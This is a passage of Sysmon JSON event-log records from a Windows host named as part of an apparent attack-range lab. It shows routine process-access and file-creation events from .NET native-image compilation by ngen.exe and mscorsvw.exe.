\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8163,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:40.294\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1354-5F25-0000-001038350E00}\r\nTargetProcessId: 4928\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:40.294","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1354-5F25-0000-001038350E00}","TargetProcessId":"4928","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8164,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:40.294\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1354-5F25-0000-001038350E00}\r\nTargetProcessId: 4928\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:40.294","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1354-5F25-0000-001038350E00}","TargetProcessId":"4928","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8165,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:40.404\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1340-5F25-0000-001011680D00}\r\nTargetProcessId: 4788\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:40.404","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1340-5F25-0000-001011680D00}","TargetProcessId":"4788","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8166,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:40.404\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1340-5F25-0000-001011680D00}\r\nTargetProcessId: 4788\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:40.404","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1340-5F25-0000-001011680D00}","TargetProcessId":"4788","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8167,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:40.404\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1340-5F25-0000-001011680D00}\r\nTargetProcessId: 4788\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:40.404","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1340-5F25-0000-001011680D00}","TargetProcessId":"4788","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8168,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:01:40.513\r\nProcessGuid: {E2A3D6B1-1354-5F25-0000-0010B0380E00}\r\nProcessId: 4788\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\12b4-0\\System.Data.DataSetExtensions.dll\r\nCreationUtcTime: 2020-08-01 07:01:40.513","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:01:40.513","ProcessGuid":"{E2A3D6B1-1354-5F25-0000-0010B0380E00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\12b4-0\\System.Data.DataSetExtensions.dll","CreationUtcTime":"2020-08-01 07:01:40.513","EventReceivedTime":"2020-08-01 07:01:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8169,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:40.544\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1340-5F25-0000-00108C6C0D00}\r\nTargetProcessId: 4848\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:40.544","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1340-5F25-0000-00108C6C0D00}","TargetProcessId":"4848","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8170,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:40.544\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1340-5F25-0000-00108C6C0D00}\r\nTargetProcessId: 4848\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:40.544","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1340-5F25-0000-00108C6C0D00}","TargetProcessId":"4848","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8171,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:40.560\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1354-5F25-0000-0010733C0E00}\r\nTargetProcessId: 4848\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:40.560","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1354-5F25-0000-0010733C0E00}","TargetProcessId":"4848","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCR